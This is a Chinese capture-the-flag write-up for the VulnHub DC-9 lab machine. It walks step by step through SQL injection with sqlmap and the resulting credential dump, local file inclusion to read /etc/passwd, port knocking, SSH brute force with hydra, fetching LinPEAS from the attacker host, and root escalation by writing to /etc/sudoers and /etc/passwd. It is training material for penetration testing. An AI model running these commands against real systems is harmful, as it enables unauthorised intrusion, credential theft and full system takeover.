出品|MS08067實驗室(www.ms08067.com)
本文作者:大方子(Ms08067實驗室核心成員)
主機資訊
Kali:192.168.56.113
DC9:192.168.56.112
實驗過程
先進行主機探測,查詢靶機的IP地址:
arp‐scan ‐‐interface eth1 192.168.56.1/24
![【vulnhub】靶機-【DC系列】DC9(附靶機)](https://i.iter01.com/images/cebfaeb6ce68a26a20d6365c2200df48717485c7e9bc9e5febd0fc7d09958093.webp)
用nmap對主機進行排查確定,DC9的IP地址為192.168.56.112
可以看到DC開放了80埠以及22埠(被過濾)
nmap ‐sC ‐sV ‐oA dc‐9 192.168.56.112
![【vulnhub】靶機-【DC系列】DC9(附靶機)](https://i.iter01.com/images/1226d9ffa5766122b909b053187d31abc05a45f27a30068b27dc1d11a647986d.webp)
所以首先從80埠入手,每個網頁都點開看看。看到這個搜尋頁面感覺可以嘗試下SQL隱碼攻擊
![【vulnhub】靶機-【DC系列】DC9(附靶機)](https://i.iter01.com/images/01403b38d95395ddd99925a27d06b44b08849fc628c0cbe7ae61a6df25732535.webp)
這裡我們用Burp進行嘗試,發現的確存在注入點
![【vulnhub】靶機-【DC系列】DC9(附靶機)](https://i.iter01.com/images/15c8d07ab46ebf2ad27d2763f69c8bb15ba70e902caf6e85fad5b3668c47d246.webp)
把請求資訊匯出為dc9.sqlmap,接下來用SQLmap進行遍歷
python3 sqlmap.py ‐r C:\Users\DFZ\Desktop\dc9.sqlmap
![【vulnhub】靶機-【DC系列】DC9(附靶機)](https://i.iter01.com/images/f80fda8b735940493d5b590dd293df750db4c8af14a913bd9913fc81ec894af6.webp)
然後接下來用sqlmap匯出資料
python3 sqlmap.py ‐r C:\Users\DFZ\Desktop\dc9.sqlmap ‐‐dbs
python3 sqlmap.py ‐r C:\Users\DFZ\Desktop\dc9.sqlmap ‐D users ‐‐tables
python3 sqlmap.py ‐r C:\Users\DFZ\Desktop\dc9.sqlmap ‐D users ‐T UserDetails ‐‐columns
python3 sqlmap.py ‐r C:\Users\DFZ\Desktop\dc9.sqlmap ‐D users ‐T UserDetails ‐C
username,password ‐‐dump
![【vulnhub】靶機-【DC系列】DC9(附靶機)](https://i.iter01.com/images/74836c2ba54c5e868344a7ead5dbaf0bd6ab4b8ba1c639a6ac6220e6cf6ec7f7.png)
python3 sqlmap.py ‐r C:\Users\DFZ\Desktop\dc9.sqlmap ‐D Staff ‐T Users ‐C Username,Password ‐‐dump
![【vulnhub】靶機-【DC系列】DC9(附靶機)](https://i.iter01.com/images/607edfbc7b25a08a4d3913f8ea13aa09a05361f76057d97bd8c3b2c594b308c4.webp)
這裡SQLmap直接幫我得到admin的密碼明文(transorbital1)
管理員賬號:admin
管理員密碼:transorbital1
附線上破解網站:https://hashes.com/en/decrypt/hash
我們將所有的賬號,密碼進行整理,分別整理到username,password(這裡需要注意的是,只要管理員 的密碼是需要解密的,其他使用者的密碼是明文)
![【vulnhub】靶機-【DC系列】DC9(附靶機)](https://i.iter01.com/images/5dc0339ff3edc4ffb9fdcef1fb49d6308403fc6075d654f9bf4347665e357700.webp)
用wfuzz進行批量登陸檢視頁面反應,只有管理員的賬號是302 (ps:意料之中)
‐c:帶顏色輸出 ‐d:post引數 ‐z:payload ‐m:模式 zip迭代 字典和佔位符一一對應進行遍歷
wfuzz ‐c ‐z file,username ‐z file,password ‐m zip ‐d 'username=FUZZ&password=FUZ2Z' http://192.168.56.112/manage.php
![【vulnhub】靶機-【DC系列】DC9(附靶機)](https://i.iter01.com/images/9fbd14c3a401f58ebe187698d49478cd511f7e63ab926f5a32eaba0a30675c20.webp)
然後我們用管理賬號進行登陸
![【vulnhub】靶機-【DC系列】DC9(附靶機)](https://i.iter01.com/images/f383cf2925a7752cb19dac4eca137ee516e1a1a42e97b5df1ef66ddcaf7cdda8.webp)
可以看到頁面下面出現File does not exist的提示,感覺很有可能就是LFI(本地檔案包含)
但是此時我們並不知道引數是多少,這裡同樣用wfuzz嘗試進行遍歷(注意這裡用把登陸之後的 cookies也要寫上,否則網頁會提示你要登陸)
檢視cookies的話可以瀏覽器直接檢視,也可以讓wfuzz把請求發給burp進行檢視
#‐p:新增代理
wfuzz ‐p 127.0.0.1:8080:HTTP
字典地址:https://github.com/danielmiessler/SecLists
‐b:cookies ‐hw:隱藏指定位元組數的結果 ‐w 字典檔案
wfuzz ‐‐hw 100 ‐b 'PHPSESSID=oshc5jht0a15efnue128kdnn9n' ‐c ‐w
/usr/share/SecLists/Discovery/Web‐Content/burp‐parameter‐names.txt
http://192.168.56.112/manage.php?FUZZ=index.php
wfuzz ‐‐hw 100 ‐b 'PHPSESSID=oshc5jht0a15efnue128kdnn9n' ‐c ‐w
/usr/share/SecLists/Discovery/Web‐Content/burp‐parameter‐names.txt
http://192.168.56.112/manage.php?FUZZ=../../../../../../../../../etc/passwd
![【vulnhub】靶機-【DC系列】DC9(附靶機)](https://i.iter01.com/images/1cfb882849f7149e679dcc04f0936d927083bdd7345c3064077d48fb6eec277b.webp)
這裡我們就找到引數file
![【vulnhub】靶機-【DC系列】DC9(附靶機)](https://i.iter01.com/images/1b7375c1462e4e3caaad1adf9fc475b936e6cace7f94665988d6d477bcdff745.webp)
然後我們通過/proc/sched_debug 來檢視Linux系統中任務的排程情況
http://192.168.56.112/manage.php?FUZZ=../../../../../../../../../proc/sched_debug
![【vulnhub】靶機-【DC系列】DC9(附靶機)](https://i.iter01.com/images/07e8e4575a43d61dafeefa9120536b0b23959e688bc57223b00a6d67445447fe.webp)
整理查詢發現靶機上執行這knockd
關於knockd的介紹:https://blog.csdn.net/nzjdsds/article/details/112476120
![【vulnhub】靶機-【DC系列】DC9(附靶機)](https://i.iter01.com/images/b7c90128a55691152915db64c7a5c6ec20e62c8125de33f35d2bd4c27b95ba43.webp)
那麼我們讀取下knockd的配置檔案
http://192.168.56.112/manage.php?FUZZ=../../../../../../../../../etc/knockd.conf
![【vulnhub】靶機-【DC系列】DC9(附靶機)](https://i.iter01.com/images/840131ad914455a7a6f0045880bfdd66c62bab3a5c2c79d22ec76e7f1a53e14b.png)
[options]
UseSyslog
[openSSH]
sequence = 7469,8475,9842
seq_timeout = 25
command = /sbin/iptables ‐I INPUT ‐s %IP% ‐p tcp ‐‐dport 22 ‐j ACCEPT
tcpflags = syn
[closeSSH]
sequence = 9842,8475,7469
seq_timeout = 25
command = /sbin/iptables ‐D INPUT ‐s %IP% ‐p tcp ‐‐dport 22 ‐j ACCEPT
tcpflags = syn
這裡提供2種敲擊方法:nc、nmap
for x in 7469 8475 9842;do nmap ‐Pn ‐‐max‐retries 0 ‐p $x 192.168.56.112;done
for x in 7469 8475 9842 22 ;do nc 192.168.56.112 $x;done
![【vulnhub】靶機-【DC系列】DC9(附靶機)](https://i.iter01.com/images/34beb831c572ce8c5fd7f5f2ae9005b54eeb6891f954303cf18d10e23bbf198b.webp)
此時SSH就可以正常連線,接下來我們用hydra來進行爆破,使用者名稱和密碼就是我們先前SQL隱碼攻擊獲得的
hydra ‐L username ‐P password ssh://192.168.56.112
![【vulnhub】靶機-【DC系列】DC9(附靶機)](https://i.iter01.com/images/5afdb2f62c03cdaaf8526bcdfc3649f0459f1f4b9fb0ca3387567ae8f06ba1c7.png)
[22][ssh] host: 192.168.56.112 login: janitor password: Ilovepeepee
[22][ssh] host: 192.168.56.112 login: joeyt password: Passw0rd
[22][ssh] host: 192.168.56.112 login: chandlerb password: UrAG0D!
然後我們對這幾個賬號都嘗試進行登陸
ssh janitor@192.168.56.112
![【vulnhub】靶機-【DC系列】DC9(附靶機)](https://i.iter01.com/images/ff134b0c6d5c02abab4343a3c7499610e8acdd9dca3db2cdfed060d0d95ff09b.webp)
只有janitor的家目錄存在一個名為.secrets-for-putin的資料夾,並且在其中又得到一些密碼
![【vulnhub】靶機-【DC系列】DC9(附靶機)](https://i.iter01.com/images/ce63867abdce8aea4bda701dab7e57ba46e8dfe9850a8b4690c0bf5c828214d6.webp)
我們把這些密碼加入到password檔案中
同時我們在janitor使用LinPEAS來探測下可利用的點
下載地址:https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
現在Kali上開啟HTTP服務
python3 ‐m http.server 80
![【vulnhub】靶機-【DC系列】DC9(附靶機)](https://i.iter01.com/images/92d1b6a057ee722cc165c5ef87adc035a752ffaf1ef84870a689d3aaa04238ef.webp)
然後在靶機上進行下載
wget http://192.168.56.114/linpeas.sh
![【vulnhub】靶機-【DC系列】DC9(附靶機)](https://i.iter01.com/images/ead88bab68a9edd45cd7c8fd86c76d7406411b02a756626d4680fbe0b51b282f.webp)
然後執行之後,感覺並沒有什麼特別的點
bash linpeas.sh
![【vulnhub】靶機-【DC系列】DC9(附靶機)](https://i.iter01.com/images/82d347bea1a90bebebfc676123b1a679837f9c424f46ce52db35618340e3cf7b.webp)
再使用hydra使用剛剛更新過的password檔案進行SSH爆破,可以看到多了一個fredf使用者
![【vulnhub】靶機-【DC系列】DC9(附靶機)](https://i.iter01.com/images/d515d6f7e354aed78270cbbd587675f0782a1390749cdf9e1be98bbb34691353.webp)
[22][ssh] host: 192.168.56.112 login: fredf password: B4‐Tru3‐001
[22][ssh] host: 192.168.56.112 login: janitor password: Ilovepeepee
[22][ssh] host: 192.168.56.112 login: joeyt password: Passw0rd
[22][ssh] host: 192.168.56.112 login: chandlerb password: UrAG0D!
然後登陸到fredf賬號,檢視下fredf的sudo許可權,可以看到fredf可以不用密碼以root許可權執 行/opt/devstuff/dist/test/test的檔案
sudo ‐l
![【vulnhub】靶機-【DC系列】DC9(附靶機)](https://i.iter01.com/images/fec32c30d0921411399aa7602886a959c38b3c3f1dfdc8f407d1d10b27074ef7.webp)
/opt/devstuff/dist/test/test是一個可執行檔案,執行後出現下面的提示,應該是一個python指令碼轉化為的可執行的檔案
![【vulnhub】靶機-【DC系列】DC9(附靶機)](https://i.iter01.com/images/2b1a5ff9c2edc8cc2363f0fb87396c9ec74da8d72f95f664922aa4b37f2309d6.webp)
可以在上級目錄找到同名的 test.py 然後cat下內容,應該是由這個檔案編譯過來的
指令碼的作用就是將第一個檔案的內容附加到另一個檔案裡面去
![【vulnhub】靶機-【DC系列】DC9(附靶機)](https://i.iter01.com/images/0e30f50ea148db0df9a53e325d115c83dd134de80b84a68a13b684efb697a8e3.webp)
這樣提權就變得非常簡單,這裡提供2個提權的思路
提權思路1:往/etc/sudoers裡面新增內容,讓使用者可以以root的許可權去執行命令
建立/dev/shm/sudoerAdd,內容如下
joeyt ALL=(ALL) ALL
然後執行
sudo /opt/devstuff/dist/test/test /dev/shm/sudoerAdd /etc/sudoers
![【vulnhub】靶機-【DC系列】DC9(附靶機)](https://i.iter01.com/images/e8208c9abcca5787dfdb3aba853c4d6aaafd21294afd3faf7b3990f9175b045d.webp)
然後登陸joeyt,然後切換成root身份,get flag
提權思路2:新增一個新的使用者到/etc/passwd,然後新新增的使用者登陸
這裡用Openssl來對密碼進行加密,在進行編輯輸入到/tmp/new-passwd
openssl passwd ‐1 ‐salt 123456 dfz
dfz:$1$123456$1VU0YpuL7WOQvLLyYTbbv1:0:0:root:/root:/bin/bash
![【vulnhub】靶機-【DC系列】DC9(附靶機)](https://i.iter01.com/images/f76e93aac30dad7939bf62b095e828354a280307e82f9c5e14f101890a107c9a.webp)
然後把/tmp/new-passwd寫入到/etc/passwd
sudo /opt/devstuff/dist/test/test /tmp/new‐passwd /etc/passwd
![【vulnhub】靶機-【DC系列】DC9(附靶機)](https://i.iter01.com/images/bffed45b14be211d1316eba81b548fb622701a7630c398d565c1df67bd1b7fe6.webp)
靶機下載地址:http://www.five86.com/downloads/DC-9.zip
轉載請聯絡作者並註明出處!